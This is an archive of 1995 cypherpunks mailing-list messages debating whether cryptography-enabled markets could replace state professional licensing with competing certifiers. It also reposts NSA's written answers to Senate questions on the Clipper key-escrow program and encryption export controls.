To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: cryptography eliminates lawyers?
Message-ID: <v01510107ac7db81f6880@[198.59.115.127]>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote,
[snip]
>> We seem to be having problems with the meanings of words.  For example, I
>> make a distinction between certification and licensing.
>
>Which, as I have indicated, I see as a "distinction without a difference."

We're at a standoff here.

[snip]
>So you wouldn't consider the Hollywood blacklist coercive?
>What about revocation of tax free status?
Not as you describe it.  No.

[snip]
>
>> And I see a
>> big difference in a market based monopoly and a government based monopoly.
>>
>
>Which, I think, is your key error- particularly in the context of this
>licensing issue, where the difference is nearly invisible.
This is our standoff.

[snip
>I think your hangup is one of overdemonizing the state to the point where
>no other evils seem to exist.
Actually, I think that much coercion (as I used it) is outside the state.
I also believe there is much evil outside of coercion but that is probably
outside the scope of the topic.  I do admit that I am emphasizing coercion
and using that as the dividing line more than other types of evil.

[snip]
>  Though one might
>> think of physical force as applying to murder, kidnapping, slavery,
>> assault, robbery, physical theft, I would also apply it to theft or damage
>> of abstract property that has properties like physical property.  I intend
>> for these to apply to many actions of the state.
>
>I think you have failed to apply them to other organizations.  Again, I
>think you are over amoured with hating "the state."  Many organizations
>not affiliated with government do violence to abstract properties.

I refered to the physical force used by gangs to enforce neighborhood
rules.  After pondering this, I think this does not apply to my approach.
The state is brought up because it is the agent of coercion in licensing.

[snip]
>If I am a producer in a horizontal territory limitation agreement for
>sales of wigets, and bob is not, bob's attempt to move into my area and
>sell widgets will be met with a boycott by all the members of my
>agreement.  Is this any less coercion?  I understand the violence is
>fairly dramatic coercion, but it is hardly the only coercion.  Do you not
>consider the Clipper program coercion?
The first is not.  The Clipper program (as I understand it) is.  Remember,
my guideline is simple threat of physical harm.


>I suggest you take a look at Nozick, Coercion, in Philisophy, Science and
>Method  (S. Morgenbessed ed. 1969) or Zimmerman, Coervice Wage Offers, 10
>Phil & Pub. Aff. 121 (1981)  Also, see Kreimer, Allocational Sanctions:
>The Problem of Negative Rights in a Positive State, 132 U. Pa. L. Rev.
>1293 (1984).
I'll look for Nozick.

[snip]
>> >I guess the center of my question is, how can you apply Web of Trust to
>> >e.g. a university degree.  Who cares what Bob and Alice think my degree
>> >is in, the client only wants to know from the institution.
>>
>> It does not matter why people would trust a certifying entity.  It might
>> have a great earned reputation, it might "borrow" some reputation from
>> bonding or audits, or it might have ties to the Real World.
>
>Exactly, it must be tied to some kind of authority.  In this case, the
>issuing institution is about the only acceptable one.
>
>I stand by the contention that a University degree cannot be certified
>acceptably by an authority not in some way connected to the University.
I think such a certification is consistent with my desire for alack of
physical coercion in this.  I assume you'd be willing to let the market
prove this point.

[snip]
>You are using coercion in a different sense.  One of the definitions I
>get in Webster's (while force is incorporated in some others) is "to
>compel to do something by the use of power, intimidation or threats."
>
>If you perfer that I use "serious persuasion" instead, fine, but I think
>you are just splitting hairs.
I think there is a big difference between "I'm going to break your house
windows unless you give me $50" and "I'm going to stop delivering milk
unless you pay your $50 milk bill".

[snip]
>Do you believe it impossible/insignificant to manipulate behavior by
>persuasive means other than violence or the threat of actual physical
>violence?
No.  And for me there are cases when it would be wrong.  I won't comment on
when it is wrong for others, but in the alternate case that includes
violence or the threat, I will say it is wrong.

>> >Can't the multiple authorities set common
>> >or near common guidelines?  Rather, don't they HAVE to in order to have
>> >their signatures worth the electrons they are transmitted with?
>>
>> In general, No.  Under many conditions market forces make services alike,
>> but more often competing businesses find particular market niches.
>
>An example please?  With specific regard to certifing authorities and
>university degrees?
A BA and BS have become practically the same, but a BSET (tech) is very
different from a BSEE (engineer).

[snip]
>I still am having trouble understanding your definition of coercion.
[snip]
>> I see a big difference in withholding a signature and sending gunmen.
>> There is no violence in withholding a signature.
>
>There is no PHYSICAL violence, this I have admitted, but the economic
>violence of such an act can be significant.  It seems that for you the
>distinction is in the emotional effect of the application of persuasive
>force, rather than the effect.
Oh. You are right in the last part.  The distinction is NOT the effect.
Not the emotional effect either.  It is the ethics and pragmatics of
relying of a competition of ideas and not force.  To put it bluntly,
coercion (as I defined it: murder, theft, ...and the threat thereof) a sin.


[snip]
>Allowing emotion to cloud one's judgement of what is and is no coercive
>is a mistake.
Agreed.  I have clear guidelines.

>I believe that your defining the words merely to distinguish who the
>certifing authority is confusing- and deceptive.
The concepts of coercive methods and noncoercive methods are there
regardless of the words.  I prefer agents of the first over agents of the
latter.

[snip]
>[market monopolies are "softer" than government ones.]
[Agreed.]

[snip]
>The base requirement of a certification from an education institution
>(for which you have provided no substitute).
Let the market decide if there really is one.
>The existance of a floor, below which it is impractical to practice a
>profession and the existance of a set of entities (of whatever number)
>who's signatures are required to transcend this floor.
Let the market decide.

[snip]
>> Perhaps, I could have use the phrases "non-coercion-based" licensing and
>> "coercion-based" licensing, but I am not comfortable with these--trade
>> licensing invokes too violent of an image.
>
>I think this construction is still flawed.  I will remain by my position
>that licensing is useful when not used to collect taxes or
>otherwise overregulate.  I also hold that the distinctions you make
>between licensing and certification are without functional difference in
>effect and are deceptive in that they suggest a significant difference in
>effect or purpose where there is none.
>
The difference in effect is in emergent market optimization.  The
difference in purpose is ethical.

I have learned that you--and perhaps others--do not see an important
difference in these two styles of influencing behavior.  I see a major
difference and in thinking the difference was obvious was slow in
understanding your position.

Great.  You're already enjoying breakfast and I still have to go to bed.

Dar

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 14 Sep 95 03:01:28 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <Pine.SUN.3.91.950913180804.6269A-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.91.950914054153.8806C-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 13 Sep 1995, Black Unicorn wrote:

> But won't clients insist on proper credentials in one form or another?  
> Doesn't the practicality and accountability of a centralized authority 
> (or several authorities) provide the best answer to this?  Who is going 
> to accept my signature promising that I did indeed get a law degree and 
> pass the bar?

An educational institution can certify its own graduates --- it does 
now.  Competing credentialing institutions is exactly what I would be 
looking for as opposed to today's coercive monoply.  

No matter how skilled, it is illegal for an unlicensed person to practice 
law, medicine, or many other professions in any state.  The nets weaken 
these restrictions because they allow action at a distance.

Note the other effects of the nets.  They make it hard to tell that you 
*are* working which reduces the impact of regulations of work by 
"illegal aliens."  Thus if I am wandering through the South of France 
while writing the 'Great American Novel' I am unlikely to get busted for 
violation of work restrictions.  The nets expand the number of jobs I 
can do while innocently wandering the South of France.  I can or will 
soon be able, for example, to manage a large international corporation 
from anywhere.

DCF

"Who actually prefers Le Massif Central to those hot and crowded southern 
climes." 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 13 Sep 95 21:25:54 PDT
To: cypherpunks@toad.com
Subject: NSA on GAK
Message-ID: <199509140420.GAA10736@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



The opening comments here by Admiral McConnell of the NSA 
appear to
parallel the comments of Mr. Michael Nelson at the September 6 
NIST
Key Escrow meeting on the use of encryption by "spies, 
terrorists,
and criminals."


URL: http://csrc.ncsl.nist.gov/secnews/ees_q-a.txt

----------

Note:  The following answers were provided by NSA to the Senate
Subcommittee on Technology and the Law in response to their 
follow-
up questions to the May 3, 1994 hearings.

                   ---------------------------

          Senate Subcommittee on Technology and the Law
 Hearing on the Administration's Key Escrow Encryption Standard

        Written Questions for Vice Admiral McConnell, NSA

*Questions for Senator Pressler:

Q:   Admiral, as you are aware, critics of the Administration's
proposal argue that as a practical matter, no criminal, foreign
spy, or terrorist of any sophisticated would be foolish enough 
to
use an encryption device designed by the NSA and approved by 
the
FBI.

How do you respond? Why do[n't you] think the people whose
telecommunications the NSA and the FBI want most to decode will 
be
the very people most unlikely to use this technology?

Answer:   From what we know today, the overriding requirement 
that
spies, terrorist, and criminals have is for readily available 
and
easy to use equipment that interoperates.  Key escrow 
encryption is
not meant to be a tool to catch criminals.  It will make 
excellent
encryption available to legitimate businesses and private 
citizens
without allowing criminals to use the telecommunications system 
to
plan and commit crimes with impunity.  We believe it would be
irresponsible for government to make excellent encryption 
broadly
available knowing that its use by criminals would make it
impossible for law enforcement agencies to conduct lawful 
wiretaps
against them.

The Department of Justice credits information gleaned through
wiretaps as leading to more than 20,000 felony convictions 
since
the early 1980s.  This would not have been possible if the
criminals had been using encryption systems the FBI could not
break.

Without government action, however, this fortunate situation
will change.  At present most people, and most criminals, don't 
use
encryption.  However, there is an increasing public awareness 
of
the value of encryption for protecting private personal and
business communications.  Increasing demand for encryption by 
the
public will likely lead to the widespread use of some form of
standardized encryption on the public telecommunications 
network.

This development would have great benefits for the country.
Legitimate businesses an private individuals could use the
telecommunications system secure in the knowledge that their
private information such as business records and credit card
numbers could not be intercepted by third parties.

But there is a down side.  Criminals, terrorists, and others
could also use the system to plan crimes, launder money, and 
the
like, completely secure in the knowledge that law enforcement
agencies could not listen to those communications.  Just as
legitimate businesses operate much more efficiently and 
effectively
using the telecommunications system than they could without it, 
so
will criminal enterprises be able to operate more efficiently 
and
effectively if they no longer have to avoid using the
telecommunications system.

The United States is faced with a choice.  We can sit back and
watch as the emerging national information infrastructure 
becomes
a valuable tool for criminals and terrorists to use to plan and
carry out their activities with complete security, or we can 
take
steps to maintain the current ability of government to conduct
lawful wiretaps so that prudent criminals will have to find 
other
less efficient ways to operate and foolish ones may be caught.  
Key
escrow encryption is the later option.

Q:   Would widespread use of the Skipjack algorithm harm U.S.
exports?  Do you think it is unlikely foreign businesses will
purchase American encryption technology if the U.S. Government
holds a set of the decoding keys?

     Answer:  I do not believe that widespread use of key 
escrow
encryption in the United States will harm U.S. exports.  If it 
has
any effect at all, it could increase exports somewhat.  Key 
escrow
encryption products provide another option for foreign 
purchasers
that they have not had in the past; to the extent that 
foreigners
doe purchase key escrow encryption products, it will mean an
increase in exports.  Meanwhile, U.S. exporters are free to
continue to sell the products they currently sell in foreign
markets and to seek license approvals for new products.

     It is difficult to predict the foreign market for U.S. key
escrow encryption technology.  Businesses that fear U.S. 
Government
interception of their communications presumably would avoid
products for which the U.S. Government hold keys.  However, 
there
are a number of reasons why foreign businesses might purchase 
them.
One major reason would be to communicate securely with U.S.
businesses that use them.  In addition, the superior level of
security provided by key escrow products (against all but 
lawful
U.S. Government access) may make them attractive to foreign
business that do not view U.S Government access as a major 
concern.
While some prospective users abroad may steer clear of key 
escrow
products because the United States will retain access, there 
may be
many who believe they are unlikely to be targeted by U.S.
intelligence in any case or for whom the superior security 
offered
by key escrow encryption products against threats of greater
concern may make key escrow products an attractive option.  For
example, a distributor of pay-TV programming may depend on
encryption to ensure that only those viewers who pay for the
service can decrypt the TV signal.  Such a distributor probably
would not be concerned about the threat of access by the United
States Government, and might favor suitable key escrow 
encryption
products over competing products that use weaker encryption
algorithms.

Q:   You were present when the previous panelist, Stephen 
Walker,
described how present U.S. laws prohibit his company from 
exporting
encryption products.  As I understand it, Senator Murray's bill
S.1846, attempts to relax these export controls somewhat.

Please give us your views on this legislation.

     Answer:  I support the Administration's position, as 
announced
by the White House on February 4, that current export controls 
must
remain in place and that regulatory changes should be 
implemented
to speed exports and reduce the licensing burden on exporters.  
The
bill you reference appears to be inconsistent with the
Administration position.  I would be happy to provide you 
further
information on the Administration's reasons for maintaining the
current export controls in an appropriate setting.

*Questions from Senator Murray:

Q:    In my office in the Hart building this February, I 
downloaded
from the Internet an Austrian program that uses DES encryption.
This was on a laptop computer, using a modem over a phone line.
The Software Publishers' Association says there are at least 
120
DES or comparable programs world wide.  However, U.S. export
control laws prohibit American exporters from selling 
comparable
DES programs abroad.

With at least 20 million people hooked up to the
Internet, how do U.S. export controls actually prevent 
criminals,
terrorists, or whoever from obtaining DES encryption software?

     Answer:  Serious users of encryption do not entrust their
security to software distributed via networks o bulletin 
boards.
There is simply too much risk that viruses, Trojan Horses,
programming errors, and other security flaws may exist in such
software which could not be detected by the user.  Serious 
users of
encryption, those who depend on encryption to protect valuable 
data
and cannot afford to take such chances, instead turn to other
sources in which they can have greater confidence.  Such 
serious
users include not only entitles which may threaten U.S. 
national
security interests, but also businesses and other major 
consumers
of encryption products.  Encryption software distribution via
Internet, bulletin board, or modem does not undermine the
effectiveness of encryption export controls.   

[Primary written questions for Admiral McConnell]

1.   The Defense Authorization Bill for Fiscal Year 1994 has
authorized $800,000 to be spent by the National Research 
Council of
the National Academy of Sciences to conduct a study of federal
encryption policy.  Can we wait to implement the key escrow
encryption program until we have the benefit of the NRC's 
study?
Do you think this study is necessary?  Should this study be
expedited?

     Answer:  We do not believe that we can wait until after 
the
NRC study is completed in 1996 to begin implementation of the 
key
escrow initiative.  The information technology industry is 
dynamic
and fast-moving, and to wait another two years or more would, 
we
believe, jeopardize the success of the initiative.  Industry 
demand
for encryption products is growing, and the technology is 
available
now to meet that demand with encryption products that provide 
an
outstanding level of security to the user conduct lawful 
wiretaps.
To wait for the completion of the NRC study to other encryption
products which would defeat lawful wiretaps.  We believe that 
such
a delay would not be in the best interest of the American 
people.

Neither do we believe that the study should be expedited.  For
our part, we will carefully consider the conclusions of the NRC
study.  We expect that it will give very careful consideration 
to
the issues, and we would not want the pressure of an 
unnecessarily
short deadline to limit the study group's ability to produce 
the
best report possible.

2.   The Administration has said that it is continuing to 
restrict
export of the most sophisticated encryption devices, in part,
"because of the concerns of our allies who fear that strong
encryption technology would inhibit their law enforcement
capabilities."  Do we really need to help our allies by 
prohibiting
the export of strong American encryption products, since those 
same
countries can simply control the encryption bought within their
borders?

     Answer:  Exports of encryption products are subject to 
review
primarily to protect U.S. national interests, including 
national
security, law enforcement, foreign policy, and other important
interests.  The law enforcement concerns of our allies are a
consideration, especially as the ability of our allies to 
combat
terrorism, drug trafficking, and other international law
enforcement problems can have direct benefits to the United 
States.
However, foreign law enforcement concerns do not drive our 
export
control policy.  We would continue to review encryption exports 
to
protect U.S. national interests even if foreign law enforcement
concerns disappeared.

3.   Do you know whether foreign governments would be 
interested in
importing key escrow encryption products to which they hold the
decoding keys?

     Answer:  Several foreign governments have expressed 
interest
in key escrow encryption technology due to their own law
enforcement concerns.  There have been some preliminary
discussions, but issues such as who would hold the escrowed 
keys
and the circumstances of government access to escrowed keys 
must be
fully vetted.

4.   The Government wants the key escrow encryption standard to
become the de facto industry standard in the United States.  
Would
the Government abandon the Clipper Chip program if it is shown 
to
be unsuccessful beyond government use?

     Answer:  We do not expect the program to be unsuccessful
beyond government.  We have developed a sound security product 
that
we expect will find many uses in government information systems 
and
further believe that government use will bring with it a 
commercial
market, particularly in the defense sector.  We have developed 
a
sound security product that we expect will find many uses in
government information systems regardless of its success in
commercial markets.

5.   Openly available devices, such as Intel-compatible
microprocessors, have seen dramatic gains, but only because
everyone was free to try to build a better version.  Given the
restrictions on who can build devices with the classified 
skipjack
algorithm, how will key escrow chips keep up with advances in
semiconductor speed, power, capacity and integration?

     Answer:  Despite the requirements that a firm must meet to
produce key escrow encryption chips, we expect that there will 
be
a number of manufacturers competing against each other to 
produce
the best product, and that such competition will drive them to 
keep
up with the latest technological advances.  It is worth noting 
that
only a few companies can produce the sophisticated 
microprocessors
you reference, yet the competition in that market has driven 
them
to achieve remarkable advances in that technology.  NSA's 
STU-III
secure telephone program provides an example of a cryptographic
product line that keeps pace with technology.

The presence of a classified algorithm does not preclude
keeping pace with technology.  Through NSA's use of a 
competitive,
multi-vendor approach, STU-III secure telephone products have
continued to evolve in response to user requirements and
technological advances despite their use of a classified 
encryption
algorithm and the consequent need for security restrictions on 
the
manufacturers.

6.   How well does the Skipjack algorithm work on
telecommunications operating at very high speeds.  Is NSA 
working
on another algorithm, called BATON, that could be used in high
speeds with a key escrow system?  Will Capstone be compatible 
with
BATON?

     Answer:  Using currently available microelectronics 
technology
the SKIPJACK algorithm could not be used for encryption at very
high speeds.  BATON is the name of an algorithm developed by 
NSA
that could be used at higher rates of speed.  We have no plans 
to
develop key escrow encryption devices using BATON, however.
Instead, we are considering another algorithm for use at high
speeds with a key escrow system.

A high-speed key escrow device based on an algorithm other
than SKIPJACK would not be "compatible with Capstone" in the 
sense
that traffic encrypted by such a device could not be decrypted 
by
Capstone, and vice versa.  However, since such a device would 
be
used for much higher-speed applications than those for which
Capstone was designed, there would be no need for it to be
compatible with Capstone in that sense.

7.   Can Capstone be used to encrypt video programming?  If so,
have cable companies been approached by any government agency 
to
use Capstone to scramble or encrypt cable program?

     Answer:  Capstone could be used to encrypt any digital 
signal,
including video programming, operating at up to about 10 
million
bits per second.  It could be used for encrypting individual 
video
channels but not for bulk encryption of many channels 
multiplexed
together in a single link.  NSA is not aware of any government
agency approaching cable companies to urge the use of Capstone.
Two manufacturers have asked us about the suitability of key 
escrow
devices for this purpose, however.

8.   Encryption software is available that can be used with 
Clipper
to encypt a message before after it has been encrypted with
Clipper.  This "double encrypting" risks bypassing the key 
escrow
feature.  If a sender first encrypts the message with software
using DES, and then transmits the message "double encrypted" 
with
Clipper, can tell you from looking at the cipher, or encrypted
text, that the underlying message was encrypted?

     Answer:  The only way to tell that a message has been 
"double
encrypted" in this way would be to decrypt the "outer layer" of
encryption, i.e. that done with Clipper.  Only then would one 
be
able to tell that the message had first been encrypted with
something else.
 
----------













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Thu, 14 Sep 95 03:21:13 PDT
To: Dar Scott <dsc@swcp.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <v01510104ac7d40ec670b@[198.59.115.127]>
Message-ID: <Pine.SUN.3.91.950914053029.16104A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 13 Sep 1995, Dar Scott wrote:

> Black Unicorn wrote,
> >On Wed, 13 Sep 1995, Dar Scott wrote:
> >
> >> Black Unicorn wrote,
> [snip}
> 
> We seem to be having problems with the meanings of words.  For example, I
> make a distinction between certification and licensing.

Which, as I have indicated, I see as a "distinction without a difference."

> Also, I see
> violence and coercion as being ultimately related to something physical.
>

So you wouldn't consider the Hollywood blacklist coercive?

What about revocation of tax free status?

I could go on for hours of examples how one can be hurt without a 
physical element.

> I'm not sure what "proper", "competent to practice"... mean.

In the context I was using them, they mean whatever the licenser 
(certifying authority if you prefer) says they mean- this is part of the 
point.

> And I see a
> big difference in a market based monopoly and a government based monopoly.
> 

Which, I think, is your key error- particularly in the context of this 
licensing issue, where the difference is nearly invisible.

> [snip]
> >Didn't I just say this above?
> >
> >A centralized, or several centralized authorities.
> 
> I had assumed you meant by authority an agent of the state that is able to
> envoke or otherwise wield the physical force of the state.

I think your hangup is one of overdemonizing the state to the point where 
no other evils seem to exist.

  By a certifying
> entities I was refering to private organizations that had no similar power
> or to government organizations that had only the power to provide
> information.

Like TRW.  Would you argue there is no coercive power in this entity?  
Yet they are not affiliated with government.

> By a licensing entity I was refering to an organization that can coerce to
> prevent the unlicensed from doing the licensed behavior.  By coercion I
> meant the threat of physical force or the force itself.

And as I indicated before, one need not threaten violence to coerce.

I will point to the TRW example again.

  Though one might
> think of physical force as applying to murder, kidnapping, slavery,
> assault, robbery, physical theft, I would also apply it to theft or damage
> of abstract property that has properties like physical property.  I intend
> for these to apply to many actions of the state.

I think you have failed to apply them to other organizations.  Again, I 
think you are over amoured with hating "the state."  Many organizations 
not affiliated with government do violence to abstract properties.

> Perhaps I erred in applying "certification" and "license" to these
> contrasting concepts, but I do think the distinction is important and the
> observation that there are fuzzy areas in between does not remove that.
>
> If I have a license from the local gang to sell drugs and the guy across
> the street does not, I could encourage the gang to do something and the guy
> might get shot.  Similarly, if I was a PE and my competitor across the
> street was not, I could encourage the state to do something that--with
> several stages of his lack of cooperation--results in his finding a gun in
> his face or worse.

If I am a producer in a horizontal territory limitation agreement for 
sales of wigets, and bob is not, bob's attempt to move into my area and 
sell widgets will be met with a boycott by all the members of my 
agreement.  Is this any less coercion?  I understand the violence is 
fairly dramatic coercion, but it is hardly the only coercion.  Do you not 
consider the Clipper program coercion?

I suggest you take a look at Nozick, Coercion, in Philisophy, Science and 
Method  (S. Morgenbessed ed. 1969) or Zimmerman, Coervice Wage Offers, 10 
Phil & Pub. Aff. 121 (1981)  Also, see Kreimer, Allocational Sanctions: 
The Problem of Negative Rights in a Positive State, 132 U. Pa. L. Rev. 
1293 (1984).

Personally I think Justice Stone had it correct with "Threat of loss, not 
hope of gain, is the essence of economic coercion."

You might also take a look at the Yale Law Review article by Reich:
(73 Yale 7 I think)
 

> >I guess the center of my question is, how can you apply Web of Trust to
> >e.g. a university degree.  Who cares what Bob and Alice think my degree
> >is in, the client only wants to know from the institution.
> 
> It does not matter why people would trust a certifying entity.  It might
> have a great earned reputation, it might "borrow" some reputation from
> bonding or audits, or it might have ties to the Real World.

Exactly, it must be tied to some kind of authority.  In this case, the 
issuing institution is about the only acceptable one.

I stand by the contention that a University degree cannot be certified 
acceptably by an authority not in some way connected to the University.
 
> >  Licensing can only be done by an
> >>      entity that can use physical force to prevent
> >>      buying and selling legal services.
> >
> >I believe you are incorrect, but I guess my main concern is your
> >characterization of "Physical force."  I am assuming you mean coercion,
> >and not that you will be jailed or such (though this may be the case).
> >
> >I would argue that as long as coercion exists (violence of any type,
> >physical or not) you have a licensing authority.  Take the hollywood
> >blacklist.  No one actually pushed around suspected pinko screenwriters
> >(well, at least, if anyone did, it was incendential) but they certainly
> >faced a great deal of persuasive motivation.  Look at the committee as
> >the licensing authority here.  (Licensing you as a non-communist as it were).
> 
> It seems I am using coercion in a different sense.  Unless blacklisting has
> physical force at its root enforcement mechanism it is not coercion and is
> very fragile.

You are using coercion in a different sense.  One of the definitions I 
get in Webster's (while force is incorporated in some others) is "to 
compel to do something by the use of power, intimidation or threats."

If you perfer that I use "serious persuasion" instead, fine, but I think 
you are just splitting hairs.

> >If several governmental and private authorities were in the practice of
> >certifing that Bob has a law degree from Tremont University, and that he
> >is competent to practice in D.C., and given that the citizens of D.C.
> >will look for these credentials, isn't this a license?  Afterall, Bob has
> >to pass some test or requirement to get the signatures.  Isn't this
> >coercion in your definition?
> 
> No.  I apologize for any confusion.

You needn't apologize, but I must admit, this looks a lot like coercion 
to me, as well as to Reich, and several justices of the Supreme Court.  

Do you believe it impossible/insignificant to manipulate behavior by 
persuasive means other than violence or the threat of actual physical 
violence?

> >Can't the multiple authorities set common
> >or near common guidelines?  Rather, don't they HAVE to in order to have
> >their signatures worth the electrons they are transmitted with?
> 
> In general, No.  Under many conditions market forces make services alike,
> but more often competing businesses find particular market niches.

An example please?  With specific regard to certifing authorities and 
university degrees?

  I would
> expect that different certs would cover different levels of expertise,
> different specializations and different breadths of specializations.  Any
> lawyer might have a dozen certs.  I would not expect there to be a single
> level of certification for all applications.  I know of several companies
> in which the primary product designer has no engineering degree.

But certainly all lawyers must have some base level of certification, 
even if this is only market enforced?  i.e. no one would accept a lawyer 
with NO certification (or few enough people to make it impossible to be 
one with some certification) this being so, the withholding of the 
required certification is still co- er... persuasion, no?

> >If you take the exteme position you seem to, there's an antitrust case here.
> I don't insist there has to be a variety.  I only desire that coercion does
> not come into play in preventing it.  As I said, if a natural monopoly
> forms at times, I am not worried.

I still am having trouble understanding your definition of coercion.

> 
> >Am I not "licensing" my key signature to people provided they pass my key
> >signature criteria?  Am I not doing violence by withholding my signature
> >and the benefits it might convey for certain "terms?"
> [snip]
> >This is the trap of the licensing argument.
> 
> I see a big difference in withholding a signature and sending gunmen.
> There is no violence in withholding a signature.

There is no PHYSICAL violence, this I have admitted, but the economic 
violence of such an act can be significant.  It seems that for you the 
distinction is in the emotional effect of the application of persuasive 
force, rather than the effect.

I've given this example before.

We take two convicted carjackers.

The first we sentence to 5 years, but after 4 years and 50 weeks, tell 
him that we are going to extend the sentence another 10 years unless he 
takes an experimental vaccine.

The second we sentence to 15 years, and after 4 years and 50 weeks, we 
tell this one that we will cut off 10 years from the sentence if he takes 
the experimental vaccine.

What's the difference?  Both have been given two choices

1>  Spend 15 years, no vaccine.
2>  Spend 5 years, take vaccine.

The point is that the first is emotionally more stacked, you feel sorry 
for the carjacker (well, maybe I should have picked crypto exporter) 
because he has been tricked.  When asked, 90% respond that the first is 
more "unfair."

Allowing emotion to cloud one's judgement of what is and is no coercive 
is a mistake.

> >The evil is not licensing, which I think serves a real purpose, but
> >created convenience fees, taxation through the withholding of licensing
> >and the use of other government largess.   I wrote a massive piece on this
> >and sent it to the list about a year and a half ago.  With interest I will
> >repost it.
> 
> Even if no one else is interested, I'd like to see it.

Let me dig it up.

Absent another public request I will send it in E-Mail only.

> >The real question is how you decide what an authority to license is.  Is
> >it to be dictated by government?  Or by market forces (i.e. the
> >reputation of the licenser).
> 
> Yes, the government vs. market question is key, but I believe the answer is
> in that distinction I used in contrasting terms "certification" and
> "license".  The "who" is tied up in what the instrument is.

I believe that your defining the words merely to distinguish who the 
certifing authority is confusing- and deceptive.

> >> >I don't see how the net will eliminate the basic need for highly
> >> >qualified professionals and the proof that they have credentials.
> >>
> >>      It won't.  The needs might shift a little but they
> >>      will be there.
> >
> >Then why will lawyers, or a 'professional monopoly' be broken?
> The meaning of "qualified professional" and "credentials" will be
> market-based and multidimensional, not defined by the state or a group
> already "qualified" using the state for enforcement.

I still think you are mistaken in that I feel you are ignoring the fact 
that no market exists below a certain certification level, regardless of 
how diverse the certifiers are.  You also still miss that credentials for 
attorneies are already multidimensional.

[market monopolies are "softer" than government ones.]

> >these authorities, and if (as you seem to be saying a few paragraphs up) it
> >is hard to break into the trusted certification business, there is a
> >monopoly again.
> I don't really think this is a problem.  It is the force-based monopoly and
> specifically the government-based monopoly I have a problem with.

I will point to the oil companies in the industrial age, as well as the 
railroads.  Certainly the potential for violence is not limited to 
government.  I hate this example, but in this particular case I think you 
are missing its context.

> [snip]
> >Like the several state Bars?
> The market advantage is slight.

I'm not sure I follow you here.

> [snip]
> >So you have estentially admitted that a central authority is required?
> >Or will be more often used?
> Not required.

Then how do you explain the points I have brought up.

The base requirement of a certification from an education institution 
(for which you have provided no substitute).

The existance of a floor, below which it is impractical to practice a 
profession and the existance of a set of entities (of whatever number) 
who's signatures are required to transcend this floor.

> [snip]
> >If your defintion of license is simply who does the coercing, I think you
> >should reconsider.
> 
> What ever the word used, I see the distinction between 1) the assertion of
> certain information and 2) the threat of force as being key.
> 
> Perhaps, I could have use the phrases "non-coercion-based" licensing and
> "coercion-based" licensing, but I am not comfortable with these--trade
> licensing invokes too violent of an image.

I think this construction is still flawed.  I will remain by my position 
that licensing is useful when not used to collect taxes or 
otherwise overregulate.  I also hold that the distinctions you make 
between licensing and certification are without functional difference in 
effect and are deceptive in that they suggest a significant difference in 
effect or purpose where there is none.

> A note to all in government licensed trades:  I recognize that licensing is
> part of the real world we live in.  Often one has to be licensed to
> practice a favorite trade.  I do not mean to describe the licensed
> themselves as violent.

Thanks.

> Dar
> 
> 
> ===========================================================
> Dar Scott               Home phone: +1 505 299 9497
> 
> Dar Scott Consulting         Voice: +1 505 299 5790
> 8637 Horacio Place NE        Email: darscott@aol.com
> Albuquerque, NM  87111              dsc@swcp.com
>                                Fax: +1 505 898 6525
> http://www.swcp.com/~correspo/DSC/DarScott.html
> ===========================================================
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Thu, 14 Sep 95 03:33:03 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <Pine.SUN.3.91.950914054153.8806C-100000@panix.com>
Message-ID: <Pine.SUN.3.91.950914062316.16104B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 14 Sep 1995, Duncan Frissell wrote:

> 
> 
> On Wed, 13 Sep 1995, Black Unicorn wrote:
> 
> > But won't clients insist on proper credentials in one form or another?  
> > Doesn't the practicality and accountability of a centralized authority 
> > (or several authorities) provide the best answer to this?  Who is going 
> > to accept my signature promising that I did indeed get a law degree and 
> > pass the bar?
> 
> An educational institution can certify its own graduates --- it does 
> now.  Competing credentialing institutions is exactly what I would be 
> looking for as opposed to today's coercive monoply.  

Yes, in the context of competing credentialing institutions I agree, but 
even now there is a base certification for such institutions 
(accreditation) which is delved out by a central authority, or common 
standards.  What the other writer's approach missed was that one could 
not, in the end, do away with the basic requirement for some kind of 
standardization, even if it was market driven.

While I too prefer the market approach, I still contend that a floor of 
credentials will exist, and indeed, should exist.

> 
> No matter how skilled, it is illegal for an unlicensed person to practice 
> law, medicine, or many other professions in any state.  The nets weaken 
> these restrictions because they allow action at a distance.

But I believe there will still be a demand for an objective, or trusted 
authority in the market.  This was my point when I asserted that 
certificated from Bob and Alice that I was a decent attorney would not be 
sufficent for most unless Bob and Alice were trusted in the "attorney 
credential" area.  So in the end, isn't a trusted authority required to 
some degree?

I think the difference here, as opposed to the Web of Trust in e.g., PGP, 
is that you are talking about legal talent, or any professional talent, 
for which payment is being made.  It's easy to accept a signature from 
Mr. Mar indicating that Bob has (in Mr. Mar's opinion) decent key 
management habits, but it's asking a great deal to extend that trust in 
Mr. Mar to his opinion of Bob's legal skills.  For that there will be a 
demand of more detailed and certain expertise in Mr. Mar, and also a 
trust that Mr. Mar is not just helping an upstart friend of his make some 
money in consulting for nuclear physics projects.

i.e. it is very difficult to estlablish the objectivity of a certifier 
without some kind of public and significant risk on the part of the 
